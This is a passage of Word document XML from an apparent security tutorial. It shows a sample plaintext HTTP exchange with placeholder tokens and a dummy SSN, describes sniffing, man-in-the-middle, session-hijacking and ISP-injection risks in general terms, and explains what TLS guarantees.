    <w:p w14:paraId="4158DB3F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>Host: api.example.com\r\n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DFDDA0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoxMjN9.abc\r\n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F45FF85" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Accept: application/json\r\n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B68543B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Cookie: session_id=s3cr3t_t0ken_abc123\r\n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7416C7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>\r\n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9AA4BD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What anyone on the network path can see:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AEB555" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Every router, switch, WiFi access point, ISP, government surveillance system, and malicious actor between the client and server can read:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406F7371" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="868"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The full URL (including query parameters: ?password=secret).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAC8FAB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="868"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>All headers (including authentication tokens, cookies, session IDs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D104FE4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="868"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The request body (form data, JSON payloads with sensitive information).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D59D38" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="868"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The response body (personal data, financial information, medical records).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFD3A72" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The response is equally exposed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B7FDBB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048DD25E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>HTTP/1.1 200 OK\r\n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCC150C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Content-Type: application/json\r\n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63505056" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Set-Cookie: session_id=new_session_xyz; Path=/; HttpOnly\r\n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B26F16D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>\r\n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40089194" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>{"user_id": 123, "name": "Alice", "ssn": "123-45-6789", "balance": 50000.00}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C5B056" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Every piece of this is readable in plaintext.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720A9759" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.2 HTTP Vulnerability — Concrete Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5D35CF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Passive eavesdropping (sniffing):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E5FF11" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="869"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Attacker on the same WiFi network runs a packet capture (Wireshark, tcpdump).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F772A35" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="869"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Sees every HTTP request/response from other users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299B16D6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="869"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Harvests credentials, session tokens, personal data — without the victim knowing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC7D294" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Active manipulation (Man-in-the-Middle):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E65281" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="870"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>Attacker intercepts HTTP traffic and MODIFIES it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF7F76D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="870"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Inject malicious JavaScript into HTML pages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DC0543" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="870"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Replace download links with malware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C2AE11" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="870"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Modify API responses (change bank balance display, alter messages).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249C63AC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="870"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Steal credentials by injecting fake login forms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA87862" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="870"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Strip security headers, inject tracking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401F093D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="870"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The client and server have NO way to detect this modification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B24780" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Session hijacking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6DA0EA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="871"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>HTTP cookies (session tokens) travel in plaintext.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC2F952" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="871"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Attacker captures the cookie → can impersonate the user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E36DC5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="871"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Known as "Firesheep attack" (2010) — trivial on public WiFi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF6F423" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ISP injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1900A6D4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="872"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Some ISPs inject advertisements into HTTP pages (modifying HTML in transit).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490CCAC3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="872"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Some inject tracking scripts/pixels.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACB7A14" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="872"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Some redirect to captive portals by modifying HTTP responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B16FF92" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="872"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>This is only possible because HTTP has no integrity protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C57679E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="619F61BE">
          <v:rect id="_x0000_i3976" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="402F0199" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. TLS — The Security Layer That Makes HTTPS Work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665D2551" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1 What TLS Provides (The Three Guarantees)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6D935B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Confidentiality (encryption):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBAD85B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="873"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>All data between client and server is encrypted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570B1424" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="873"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Anyone intercepting the traffic sees only random-looking bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F10974C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="873"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Cannot read URLs, headers, bodies, cookies, or any content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A891FDE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Integrity (tamper detection):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199858A6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="874"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Every record is authenticated with a MAC (Message Authentication Code).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048D9959" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="874"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>If any byte is modified in transit, the recipient detects it and rejects the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474091EC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="874"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Prevents injection, modification, or truncation of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132AD31E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Authentication (identity verification):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF1EB34" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="875"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The server proves its identity using a certificate (signed by a trusted Certificate Authority).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D92AC5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="875"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The client knows it's talking to the REAL server (not an impersonator).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014A8B3B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="875"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Optionally: the client can prove its identity too (mutual TLS / mTLS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CC0ABC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2 What TLS Does NOT Protect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C49FE5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="876"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metadata:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> The destination IP address, port, and approximate timing are visible (it's still TCP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4336F21D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
